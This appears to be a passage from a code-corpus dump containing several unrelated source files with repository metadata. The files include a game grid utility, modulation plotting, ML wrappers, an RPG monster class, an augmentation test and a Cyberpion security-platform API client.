assert not browser.is_text_present("Foo")
# the admin can see the signed up users
browser.visit(f'/volunteers/{scenario.latest_period.id.hex}')
assert browser.is_text_present("Foo")
assert not browser.is_text_present("Bestätigt")
browser.find_by_css('.actions-button').first.click()
browser.find_link_by_partial_text("Als bestätigt markieren")
browser.click_link_by_partial_text("Als bestätigt markieren")
assert browser.is_text_present("Bestätigt")
# now the volunteer is in the list
browser.visit('/attendees/zoo')
assert browser.is_text_present("Foo")
| 33.264808 | 79 | 0.69006 |
91b3d0d38d6da9f410a5761f48be3c9bec26cdaa
| 49 |
py
|
Python
|
pyramid-creator/app/config.py
|
jinnn-dev/patholearn
|
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2022-02-20T12:45:04.000Z
|
2022-02-20T12:45:04.000Z
|
pyramid-creator/app/config.py
|
JamesNeumann/learning-by-annotations
|
c2b5e4b653eeb1c973aa5a7dad35ac8be18cb1ad
|
[
"MIT"
] | 21 |
2021-11-01T10:13:56.000Z
|
2021-12-02T10:02:13.000Z
|
pyramid-creator/app/config.py
|
jinnn-dev/patholearn
|
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2021-12-16T18:20:55.000Z
|
2021-12-16T18:20:55.000Z
|
class Config:
TEMP_IMAGES_FOLDER = "/data"
| 16.333333 | 33 | 0.673469 |
91bcdfeee7af286bb3aada18c0cb79b683a3032d
| 4,852 |
py
|
Python
|
bots/botutilities/grid.py
|
jorgeparavicini/FourWins
|
1c5e8a23b4464ef6b71d70c9ff040aa004b9ca83
|
[
"MIT"
] | 1 |
2021-01-20T18:33:01.000Z
|
2021-01-20T18:33:01.000Z
|
bots/botutilities/grid.py
|
jorgeparavicini/FourWins
|
1c5e8a23b4464ef6b71d70c9ff040aa004b9ca83
|
[
"MIT"
] | null | null | null |
bots/botutilities/grid.py
|
jorgeparavicini/FourWins
|
1c5e8a23b4464ef6b71d70c9ff040aa004b9ca83
|
[
"MIT"
] | 2 |
2019-09-04T08:27:14.000Z
|
2019-09-06T20:32:30.000Z
|
from __future__ import annotations
from typing import TypeVar, List, Generic, Callable
T = TypeVar('T')
"""
GRID LAYOUT
(0,2) (1,2) (2,2)
(0,1) (1,1) (2,1)
(0,0) (1,0) (2,0)
"""
class Grid(Generic[T]):
def __init__(self, grid: List[List[T]]):
self.__grid = grid
if len(grid) > 0 and len(grid[0]) > 0:
self.__width = len(grid[0])
self.__height = len(grid)
else:
self.__width = 0
self.__height = 0
@staticmethod
def empty():
return Grid(grid=[])
@property
def width(self):
return self.__width
@property
def height(self):
return self.__height
@classmethod
def create(cls, width: int, height: int, default: T = 0) -> Grid[T]:
return cls([x[:] for x in [[default] * width] * height])
def at(self, x: int, y: int) -> T:
return self.__grid[y][x]
def set_at(self, x: int, y: int, val: T):
self.__grid[y][x] = val
# Declare generic parameter for Mapped Callback
S = TypeVar('S')
# We map all values from the current Grid which all have type T, to type S
def map(self, func: Callable[[T], S]) -> Grid[S]:
return Grid([list(map(func, row)) for row in self.__grid])
def row(self, at: int) -> List[T]:
return self.__grid[at]
def column(self, at: int) -> List[T]:
return [row[at] for row in self.__grid]
def is_column_full(self, column: int) -> bool:
return self.column(column)[-1] is not 0
def print(self):
for row in reversed(self.__grid):
print(row)
def check_horizontal_group_at(self, bot_id: int, x: int, y: int) -> int:
assert (0 <= x < self.width)
if self.at(x, y) != bot_id:
return 0
result = 1
current_x = x
# go right
while True:
if current_x >= self.width - 1:
break
current_x += 1
if self.at(current_x, y) == bot_id:
result += 1
else:
break
current_x = x
while True:
if current_x <= 0:
break
current_x -= 1
if self.at(current_x, y) == bot_id:
result += 1
else:
break
return result
def check_vertical_group_at(self, bot_id: int, x: int, y: int) -> int:
assert 0 <= y < self.height
if self.at(x, y) != bot_id:
return 0
result = 1
current_y = y
while True:
if current_y >= self.height - 1:
break
current_y += 1
if self.at(x, current_y) == bot_id:
result += 1
else:
break
current_y = y
while True:
if current_y <= 0:
break
current_y -= 1
if self.at(x, current_y) == bot_id:
result += 1
else:
break
return result
def check_forward_diagonal_group_at(self, bot_id: int, x: int, y: int) -> int:
assert 0 <= x < self.width
assert 0 <= y < self.height
if self.at(x, y) != bot_id:
return 0
result = 1
current_x = x
current_y = y
while True:
if current_y >= self.height - 1 or current_x >= self.width - 1:
break
current_x += 1
current_y += 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
current_x = x
current_y = y
while True:
if current_x <= 0 or current_y <= 0:
break
current_x -= 1
current_y -= 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
return result
def check_backward_diagonal_group_at(self, bot_id: int, x: int, y: int) -> int:
assert 0 <= x < self.width
assert 0 <= y < self.height
if self.at(x, y) != bot_id:
return 0
result = 1
current_x = x
current_y = y
while True:
if current_y >= self.height - 1 or current_x <= 0:
break
current_x -= 1
current_y += 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
current_y = y
current_x = x
while True:
if current_y <= 0 or current_x >= self.width - 1:
break
current_x += 1
current_y -= 1
if self.at(current_x, current_y) == bot_id:
result += 1
else:
break
return result
| 25.536842 | 83 | 0.476298 |
37ce90a519ae0c88b8597cbc9e32c992964ff468
| 5,810 |
py
|
Python
|
doc/fb_memoir/python/combined.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/combined.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | null | null | null |
doc/fb_memoir/python/combined.py
|
ghsecuritylab/project-powerline
|
6c0ec13bbfc11c3790c506f644db4fe45021440a
|
[
"MIT"
] | 1 |
2020-03-08T01:50:58.000Z
|
2020-03-08T01:50:58.000Z
|
#!/usr/bin/env python3
import sympy as sp
import numpy as np
import matplotlib.pyplot as plt
# Approx 10 kHz
w = 66e3
deltaW = 33e3
T = 2 * np.pi / w
T_lo = 2 * np.pi / (w - deltaW)
T_hi = 2 * np.pi / (w + deltaW)
A1 = 5
A2 = 30
A = 1.5
x = sp.Symbol('x')
#func1 = 1/2 * (2 + sp.cos(2*w1*x) + sp.cos(2*w2*x) + 2*sp.cos((w1+w2)*x) + 2*sp.cos((w1-w2)*x))
ask_mod_lo = A1 * sp.sin(w * x)
ask_mod_hi = A2 * sp.sin(w * x)
ask_mod_hi_2 = A2 * sp.sin(w * x + np.pi/2) # Short-circuit version
ask_mod_lo_ld = sp.lambdify(x,ask_mod_lo, modules=['numpy'])
ask_mod_hi_ld = sp.lambdify(x,ask_mod_hi, modules=['numpy'])
ask_mod_hi_ld_2 = sp.lambdify(x,ask_mod_hi_2, modules=['numpy'])
fsk_carrier = A * sp.sin(w * x - sp.pi/2)
fsk_mod_lo = A * sp.sin((w - deltaW) * x - sp.pi/2)
fsk_mod_hi = A * sp.sin((w + deltaW) * x - sp.pi/2)
fsk_carrier_ld = sp.lambdify(x,fsk_carrier, modules=['numpy'])
fsk_mod_lo_ld = sp.lambdify(x,fsk_mod_lo, modules=['numpy'])
fsk_mod_hi_ld = sp.lambdify(x,fsk_mod_hi, modules=['numpy'])
# From 0 to 10 milliseconds
t = np.linspace(0,16*T,1000)
t_lo_1 = np.linspace( 0, 4*T, 1000)
t_hi_1 = np.linspace( 4*T, 4*T + 4*T, 1000)
t_lo_2 = np.linspace(4*T + 4*T, 8*T + 4*T, 1000)
t_hi_2 = np.linspace(8*T + 4*T, 8*T + 8*T, 1000)
plt.rc('text',usetex=True)
plt.rc('font',family='serif',size=11)
plt.rc('legend', fontsize=9)
plt.rc('axes', labelsize=9, titlesize=11)
plt.rc('xtick', labelsize=9)
plt.rc('ytick', labelsize=9)
plt.rc('savefig', transparent=True)
plt.rc('lines', linewidth=0.5)
plt.rc('axes',linewidth=0.5)
fig1 = plt.figure(num=1,figsize=(10,15))
#fig1.suptitle(r'Frequenzanteile bei Intensit\"at einer Schwebung')
# Data
ax1 = fig1.add_subplot(511)
ax1.plot([ 0, 4*T], [0,0], color='blue')
ax1.plot([ 4*T, 4*T], [0,1], color='grey')
ax1.plot([ 4*T, 8*T], [1,1], color='magenta')
ax1.plot([ 8*T, 8*T], [1,0], color='grey')
ax1.plot([ 8*T, 12*T], [0,0], color='blue')
ax1.plot([12*T, 12*T], [0,1], color='grey')
ax1.plot([12*T, 16*T], [1,1], color='magenta')
ax1.set_ylim([-0.1,1.1])
ax1.set_xlim([0,16*T])
ax1.set_title("Daten")
ax1.set_ylabel('Symbol')
ax1.set_xlabel('Zeit')
ax1.get_xaxis().set_ticks([]);
ax1.get_yaxis().set_ticks([0,1]);
# Modulated Signal, FSK
ax2 = fig1.add_subplot(512)
ax2.plot(t_lo_1, fsk_mod_lo_ld(t_lo_1), label=r"Tr\"agerfrequenz", color='blue')
ax2.plot(t_hi_1, fsk_mod_hi_ld(t_hi_1), label=r"Tr\"agerfrequenz", color='magenta')
ax2.plot(t_lo_2, fsk_mod_lo_ld(t_lo_2), label=r"Tr\"agerfrequenz", color='blue')
ax2.plot(t_hi_2, fsk_mod_hi_ld(t_hi_2), label=r"Tr\"agerfrequenz", color='magenta')
ax2.set_ylim([-1.1 * A, 1.1 * A])
ax2.set_xlim([0,16*T])
ax2.set_title(r"Moduliertes Signal, FSK")
ax2.set_ylabel('Spannung')
ax2.set_xlabel('Zeit')
ax2.get_xaxis().set_ticks([]);
ax2.get_yaxis().set_ticks([]);
# Modulated Signal, ASK
ax3 = fig1.add_subplot(513)
ax3.plot(t_lo_1, ask_mod_lo_ld(t_lo_1), label=r"Tr\"agerfrequenz", color='blue')
ax3.plot(t_hi_1, ask_mod_hi_ld(t_hi_1), label=r"Tr\"agerfrequenz", color='magenta')
ax3.plot(t_lo_2, ask_mod_lo_ld(t_lo_2), label=r"Tr\"agerfrequenz", color='blue')
ax3.plot(t_hi_2, ask_mod_hi_ld(t_hi_2), label=r"Tr\"agerfrequenz", color='magenta')
ax3.set_ylim([-1.1 * A2, 1.1 * A2])
ax3.set_xlim([0,16*T])
ax3.set_title(r"Moduliertes Signal, ASK")
ax3.set_ylabel('Spannung')
ax3.set_xlabel('Zeit')
ax3.get_xaxis().set_ticks([]);
ax3.get_yaxis().set_ticks([]);
# Modulated Signal, OOK, Oscillator
ax4 = fig1.add_subplot(514)
ax4.plot([0, 4*T], [0,0] , color='blue')
ax4.plot(t_hi_1, ask_mod_hi_ld(t_hi_1), label=r"Tr\"agerfrequenz", color='magenta')
ax4.plot([8*T, 12*T], [0,0], color='blue')
ax4.plot(t_hi_2, ask_mod_hi_ld(t_hi_2), label=r"Tr\"agerfrequenz", color='magenta')
ax4.set_ylim([-1.1 * A2, 1.1 * A2])
ax4.set_xlim([0,16*T])
ax4.set_title(r"Moduliertes Signal, OOK, Oszillator")
ax4.set_ylabel('Spannung')
ax4.set_xlabel('Zeit')
ax4.get_xaxis().set_ticks([]);
ax4.get_yaxis().set_ticks([]);
# Modulated Signal, Short-Circuit
ax5 = fig1.add_subplot(515)
ax5.plot([ 0, 4*T], [960,960], color='blue')
ax5.step([ 4*T + T/2 * 0, 4*T + T/2 ], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 1, 4*T + T/2 * 2], [900,960], color='magenta')
ax5.step([ 4*T + T/2 * 2, 4*T + T/2 * 3], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 3, 4*T + T/2 * 4], [900,960], color='magenta')
ax5.step([ 4*T + T/2 * 4, 4*T + T/2 * 5], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 5, 4*T + T/2 * 6], [900,960], color='magenta')
ax5.step([ 4*T + T/2 * 6, 4*T + T/2 * 7], [960,900], color='magenta')
ax5.step([ 4*T + T/2 * 7, 4*T + T/2 * 8], [900,960], color='magenta')
ax5.plot([ 8*T, 12*T], [960,960], color='blue')
ax5.step([12*T + T/2 * 0, 12*T + T/2 ], [960,900], color='magenta')
ax5.step([12*T + T/2 * 1, 12*T + T/2 * 2], [900,960], color='magenta')
ax5.step([12*T + T/2 * 2, 12*T + T/2 * 3], [960,900], color='magenta')
ax5.step([12*T + T/2 * 3, 12*T + T/2 * 4], [900,960], color='magenta')
ax5.step([12*T + T/2 * 4, 12*T + T/2 * 5], [960,900], color='magenta')
ax5.step([12*T + T/2 * 5, 12*T + T/2 * 6], [900,960], color='magenta')
ax5.step([12*T + T/2 * 6, 12*T + T/2 * 7], [960,900], color='magenta')
ax5.step([12*T + T/2 * 7, 12*T + T/2 * 8], [900,960], color='magenta')
ax5.set_ylim([890,970])
ax5.set_xlim([0,16*T])
ax5.set_title(r"Moduliertes Signal, OOK, Kurzschluss \"uber Modul")
ax5.set_ylabel('Spannung')
ax5.set_xlabel('Zeit')
ax5.get_xaxis().set_ticks([]);
ax5.get_yaxis().set_ticks([]);
fig1.subplots_adjust(bottom=0.05,top=0.95,left=0.10,right=0.95,hspace=0.45)
#fig1.set_figwidth(5.314) # Textwidth
fig1.set_figwidth(5.1)
# fig1.set_figheight(6.5)
fig1.set_figheight(8)
#fig1.subplots_adjust(bottom=0.01,top=0.99,left=0.05,right=0.99)
fig1.savefig('../images/python/modulation.pgf')
#plt.show()
| 37.727273 | 96 | 0.640448 |
72eda700c15050a4608c5a0b8f7c7eea8f3cf744
| 282 |
py
|
Python
|
9.10.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.10.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.10.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
class TreeCount:
def countWays(self, n):
if n <= 1:
return n
def C(m, n):
# 求C(m, n)
f = lambda x, y: x * y
return reduce(f, range(m, m - n, -1)) / reduce(f, range(1, n + 1))
return C(n * 2, n) / (n + 1)
| 23.5 | 78 | 0.397163 |
f488c6621fa54ad1488c351c9a256506bd7bd1d2
| 7,336 |
py
|
Python
|
lale/lib/autogen/gaussian_process_classifier.py
|
vishalbelsare/lale
|
654ca29ec0234b478d26724a25df28b28f5c0bc0
|
[
"Apache-2.0"
] | 265 |
2019-08-06T14:45:43.000Z
|
2022-03-30T23:57:48.000Z
|
lale/lib/autogen/gaussian_process_classifier.py
|
vishalbelsare/lale
|
654ca29ec0234b478d26724a25df28b28f5c0bc0
|
[
"Apache-2.0"
] | 467 |
2019-08-08T02:01:21.000Z
|
2022-03-25T16:12:00.000Z
|
lale/lib/autogen/gaussian_process_classifier.py
|
vishalbelsare/lale
|
654ca29ec0234b478d26724a25df28b28f5c0bc0
|
[
"Apache-2.0"
] | 81 |
2019-08-07T19:59:31.000Z
|
2022-03-31T09:11:58.000Z
|
from numpy import inf, nan
from sklearn.gaussian_process import GaussianProcessClassifier as Op
from lale.docstrings import set_docstrings
from lale.operators import make_operator
class _GaussianProcessClassifierImpl:
def __init__(self, **hyperparams):
self._hyperparams = hyperparams
self._wrapped_model = Op(**self._hyperparams)
def fit(self, X, y=None):
if y is not None:
self._wrapped_model.fit(X, y)
else:
self._wrapped_model.fit(X)
return self
def predict(self, X):
return self._wrapped_model.predict(X)
def predict_proba(self, X):
return self._wrapped_model.predict_proba(X)
_hyperparams_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "inherited docstring for GaussianProcessClassifier Gaussian process classification (GPC) based on Laplace approximation.",
"allOf": [
{
"type": "object",
"required": [
"kernel",
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"warm_start",
"copy_X_train",
"random_state",
"multi_class",
"n_jobs",
],
"relevantToOptimizer": [
"optimizer",
"n_restarts_optimizer",
"max_iter_predict",
"multi_class",
],
"additionalProperties": False,
"properties": {
"kernel": {
"XXX TODO XXX": "kernel object",
"description": "The kernel specifying the covariance function of the GP",
"enum": [None],
"default": None,
},
"optimizer": {
"anyOf": [
{"laleType": "callable", "forOptimizer": False},
{"enum": ["fmin_l_bfgs_b"]},
],
"default": "fmin_l_bfgs_b",
"description": "Can either be one of the internally supported optimizers for optimizing the kernel's parameters, specified by a string, or an externally defined optimizer passed as a callable",
},
"n_restarts_optimizer": {
"type": "integer",
"minimumForOptimizer": 0,
"maximumForOptimizer": 1,
"distribution": "uniform",
"default": 0,
"description": "The number of restarts of the optimizer for finding the kernel's parameters which maximize the log-marginal likelihood",
},
"max_iter_predict": {
"type": "integer",
"minimumForOptimizer": 100,
"maximumForOptimizer": 101,
"distribution": "uniform",
"default": 100,
"description": "The maximum number of iterations in Newton's method for approximating the posterior during predict",
},
"warm_start": {
"type": "boolean",
"default": False,
"description": "If warm-starts are enabled, the solution of the last Newton iteration on the Laplace approximation of the posterior mode is used as initialization for the next call of _posterior_mode()",
},
"copy_X_train": {
"type": "boolean",
"default": True,
"description": "If True, a persistent copy of the training data is stored in the object",
},
"random_state": {
"anyOf": [
{"type": "integer"},
{"laleType": "numpy.random.RandomState"},
{"enum": [None]},
],
"default": None,
"description": "The generator used to initialize the centers",
},
"multi_class": {
"XXX TODO XXX": "string, default",
"description": "Specifies how multi-class classification problems are handled",
"enum": ["one_vs_one", "one_vs_rest"],
"default": "one_vs_rest",
},
"n_jobs": {
"anyOf": [{"type": "integer"}, {"enum": [None]}],
"default": 1,
"description": "The number of jobs to use for the computation",
},
},
}
],
}
_input_fit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Fit Gaussian process classification model",
"type": "object",
"required": ["X", "y"],
"properties": {
"X": {
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
"description": "Training data",
},
"y": {
"type": "array",
"items": {"type": "number"},
"description": "Target values, must be binary",
},
},
}
_input_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Perform classification on an array of test vectors X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Predicted target values for X, values are from ``classes_``",
"type": "array",
"items": {"type": "number"},
}
_input_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Return probability estimates for the test vector X.",
"type": "object",
"required": ["X"],
"properties": {
"X": {"type": "array", "items": {"type": "array", "items": {"type": "number"}}}
},
}
_output_predict_proba_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Returns the probability of the samples for each class in the model",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
_combined_schemas = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Combined schema for expected data and hyperparameters.",
"documentation_url": "https://scikit-learn.org/0.20/modules/generated/sklearn.gaussian_process.GaussianProcessClassifier#sklearn-gaussian_process-gaussianprocessclassifier",
"import_from": "sklearn.gaussian_process",
"type": "object",
"tags": {"pre": [], "op": ["estimator", "classifier"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
"input_predict_proba": _input_predict_proba_schema,
"output_predict_proba": _output_predict_proba_schema,
},
}
GaussianProcessClassifier = make_operator(
_GaussianProcessClassifierImpl, _combined_schemas
)
set_docstrings(GaussianProcessClassifier)
| 39.654054 | 223 | 0.531625 |
beb90015089d5923b08550d2d8deae199aa7b26b
| 1,955 |
py
|
Python
|
TestBot/test_cogs/rpgFunctions/monster.py
|
austinmh12/DiscordBots
|
55550b68a7ad6423de55e62dbbff93fd88f08ff2
|
[
"MIT"
] | null | null | null |
TestBot/test_cogs/rpgFunctions/monster.py
|
austinmh12/DiscordBots
|
55550b68a7ad6423de55e62dbbff93fd88f08ff2
|
[
"MIT"
] | null | null | null |
TestBot/test_cogs/rpgFunctions/monster.py
|
austinmh12/DiscordBots
|
55550b68a7ad6423de55e62dbbff93fd88f08ff2
|
[
"MIT"
] | null | null | null |
from .. import sql, log, BASE_PATH, chunk, Page
from random import randint, random, choice
from . import *
#############
# Constants #
#############
#############
# Functions #
#############
def get_monsters():
df = sql('rpg', 'select * from monsters')
if df.empty:
return []
return [Monster(**d) for d in df.to_dict('records')]
def get_monster(name):
df = sql('rpg', 'select * from monsters where name = ?', (name,))
if df.empty:
return None
return Monster(**df.to_dict('records')[0])
# TODO: Add add_monster function for admin
###########
# Classes #
###########
class Monster:
def __init__(self,
name,
primary_stat,
secondary_stat,
min_damage,
max_damage,
crit_chance,
base_str,
base_dex,
base_int,
base_con,
str_mod,
dex_mod,
int_mod,
con_mod,
base_exp,
exp_mod
):
self.name = name
self.primary_stat = primary_stat
self.secondary_stat = secondary_stat
self.min_damage = min_damage
self.max_damage = max_damage
self.crit_chance = crit_chance
self.base_str = base_str
self.base_dex = base_dex
self.base_int = base_int
self.base_con = base_con
self.str_mod = str_mod
self.dex_mod = dex_mod
self.int_mod = int_mod
self.con_mod = con_mod
self.base_exp = base_exp
self.exp_mod = exp_mod
def generate_stats(self, level):
s = self.base_str + (level * self.str_mod)
d = self.base_dex + (level * self.dex_mod)
i = self.base_int + (level * self.int_mod)
c = self.base_con + (level * self.con_mod)
self.stats = {'STR': s, 'DEX': d, 'INT': i, 'CON': c}
self.current_con = c * 10
self.level = level
@property
def defense(self):
return 80 / (80 + self.stats['STR'])
@property
def damage(self):
dmg = randint(self.level, floor(self.level * 1.25))
dmg += floor(self.stats.get(self.primary_stat, 0) / 10)
dmg += floor(self.stats.get(self.secondary_stat, 0) / 20)
if random() < self.crit_chance:
dmg *= 1.5
return dmg
| 22.732558 | 66 | 0.640409 |
fe8624c73ab06467e18a8973fb28b74989f0036c
| 3,547 |
py
|
Python
|
research/cv/autoaugment/src/dataset/autoaugment/aug_test.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-07-03T06:52:20.000Z
|
2021-07-03T06:52:20.000Z
|
research/cv/autoaugment/src/dataset/autoaugment/aug_test.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/cv/autoaugment/src/dataset/autoaugment/aug_test.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
Visualization for testing purposes.
"""
import sys
import matplotlib.pyplot as plt
import numpy as np
import mindspore.dataset as ds
from mindspore import context
context.set_context(mode=context.GRAPH_MODE, device_target='CPU')
def compare(data_path, index=None, ops=None, rescale=False):
"""Visualize images before and after applying auto-augment."""
# Load dataset
ds.config.set_seed(8)
dataset_orig = ds.Cifar10Dataset(
data_path,
num_samples=5,
shuffle=True,
)
# Apply transformations
dataset_augmented = dataset_orig.map(
operations=[Augment(index)] if ops is None else ops,
input_columns=['image'],
)
# Collect images
image_orig_list, image_augmented_list, label_list = [], [], []
for data in dataset_orig.create_dict_iterator():
image_orig_list.append(data['image'])
label_list.append(data['label'])
print('Original image: shape {}, label {}'.format(
data['image'].shape, data['label'],
))
for data in dataset_augmented.create_dict_iterator():
image_augmented_list.append(data['image'])
print('Augmented image: shape {}, label {}'.format(
data['image'].shape, data['label'],
))
num_samples = len(image_orig_list)
fig, mesh = plt.subplots(ncols=num_samples, nrows=2, figsize=(5, 3))
axes = mesh[0]
for i in range(num_samples):
axes[i].axis('off')
axes[i].imshow(image_orig_list[i].asnumpy())
axes[i].set_title(label_list[i].asnumpy())
axes = mesh[1]
for i in range(num_samples):
axes[i].axis('off')
img = image_augmented_list[i].asnumpy().transpose((1, 2, 0))
if rescale:
max_val = max(np.abs(img.min()), img.max())
img = (img / max_val + 1) / 2
print('min and max of the transformed image:', img.min(), img.max())
axes[i].imshow(img)
fig.tight_layout()
fig.savefig(
'aug_test.png' if index is None else 'aug_test_{}.png'.format(index),
)
if __name__ == '__main__':
sys.path.append('..')
from autoaugment.third_party.policies import good_policies
from autoaugment import Augment
cifar10_data_path = './cifar-10-batches-bin/'
# Test the feasibility of each policy
for ind, policy in enumerate(good_policies()):
if ind >= 3:
pass
# break
print(policy)
compare(cifar10_data_path, ind)
# Test the random policy selection and the normalize operation
MEAN = [0.49139968, 0.48215841, 0.44653091]
STD = [0.24703223, 0.24348513, 0.26158784]
compare(
cifar10_data_path,
ops=[Augment(mean=MEAN, std=STD, enable_basic=False)],
)
compare(
cifar10_data_path,
ops=[Augment(mean=MEAN, std=STD, enable_basic=False)],
rescale=True,
)
| 33.149533 | 78 | 0.638286 |
43070d1cdd1c7060e4669542841e1169dc229696
| 17,520 |
py
|
Python
|
Packs/Cyberpion/Integrations/Cyberpion/Cyberpion.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Cyberpion/Integrations/Cyberpion/Cyberpion.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Cyberpion/Integrations/Cyberpion/Cyberpion.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from typing import Dict, Tuple, List
from datetime import timezone
from CommonServerPython import *
"""Cyberpion Integration for Cortex XSOAR (aka Demisto)
"""
''' IMPORTS '''
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%d %H:%M:%S.%f %Z'
DEFAULT_MAX_INCIDENTS_TO_FETCH = 200
CONNECTION_TIMEOUT = 30.0
READ_TIMEOUT = 30.0
VALID_STATUS_CODES = (200,)
NUM_OF_RETRIES = 3
BACKOFF_FACTOR = 1.0 # see documentation in CommonServerPython._http_request
ACTION_ITEM_TYPE_NAME = 'cyberpion_action_item'
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any Demisto logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
For this implementation, no special attributes defined
"""
def get_domain_state(self, domain: str):
params = {
'verbosity': 'details',
'domain': domain
}
demisto.debug(f'getting domain state for domain- {domain}')
http_response = self._http_request(
method='GET',
url_suffix='/domainstate/',
params=params,
resp_type='json',
ok_codes=VALID_STATUS_CODES,
timeout=(CONNECTION_TIMEOUT, READ_TIMEOUT),
retries=NUM_OF_RETRIES,
backoff_factor=BACKOFF_FACTOR,
raise_on_status=True
)
if 'results' not in http_response:
raise Exception(f'bad response from server!. response: {json.dumps(http_response, indent=2)}')
http_response = http_response['results']
if len(http_response) == 0:
demisto.error(f'no response from server for domain: {domain}')
return {}
http_response = http_response[0]
demisto.debug(f'after getting domain state for domain- {domain}')
reverse_ips = http_response.get('ips')
if reverse_ips is None:
raise Exception(f'in server\'s response: ips is none. response: {json.dumps(http_response, indent=2)}')
if type(reverse_ips) is dict:
formatted_reverse_ips = '\n'.join(
[f'{k}: {v}' for k, v in reverse_ips.items()])
else:
formatted_reverse_ips = reverse_ips
http_response['ips'] = formatted_reverse_ips
domain_types = http_response.get('domain_types')
if domain_types is None:
raise Exception(
f'in server\'s response: domain_types is none. response: {json.dumps(http_response, indent=2)}')
domain_info = ''
for idx, domain_type in enumerate(domain_types, 1):
domain_info += f'{idx}.\n'
domain_info += '\n'.join(
[f'{k}: {v}' for k, v in domain_type.items()])
http_response['domain_types'] = domain_info
return http_response
def get_action_items(self,
min_severity: int,
alert_types: list = None,
show_only_active=True,
max_fetch: int = None,
last_fetched_creation_time: str = None,
domain: str = None
) -> List[dict]:
params = {
'verbosity': 'details',
'urgency__gte': min_severity,
'ordering': 'creation_time',
'is_open': 'true' if show_only_active else 'false'
}
if alert_types:
params['category'] = ','.join(alert_types)
if max_fetch:
params['page_size'] = max_fetch
if last_fetched_creation_time:
params['creation_time__gt'] = last_fetched_creation_time
if domain:
params['domain'] = domain
http_responses = []
# call API
params['page'] = str(1)
demisto.debug(f'getting action items, domain={domain}')
http_response = self._http_request(
method='GET',
url_suffix='/actionitems/',
params=params,
resp_type='json',
ok_codes=VALID_STATUS_CODES,
timeout=(CONNECTION_TIMEOUT, READ_TIMEOUT),
retries=NUM_OF_RETRIES,
backoff_factor=BACKOFF_FACTOR,
raise_on_status=True
)
demisto.debug(f'after getting action items, domain={domain}')
if 'results' not in http_response:
raise Exception('failed to read action items.\nError: got response without \'results\' key')
results = http_response['results']
for idx, action_item in enumerate(results):
technical_det = action_item.get('technical_details', {})
if technical_det is None:
raise Exception(f'technical details is none. {json.dumps(action_item, indent=2)}')
if type(technical_det) is dict:
formatted_technical_details = '\n'.join(
[f'{k}: {v}' for k, v in technical_det.items()])
else:
formatted_technical_details = technical_det
results[idx]['technical_details'] = formatted_technical_details
results[idx]['alert_type'] = ACTION_ITEM_TYPE_NAME
http_responses.append(results)
demisto.debug(f'finished getting action items, number of pages: {len(http_responses)}, domain={domain}')
final_results = []
for response in http_responses:
final_results += response
return final_results
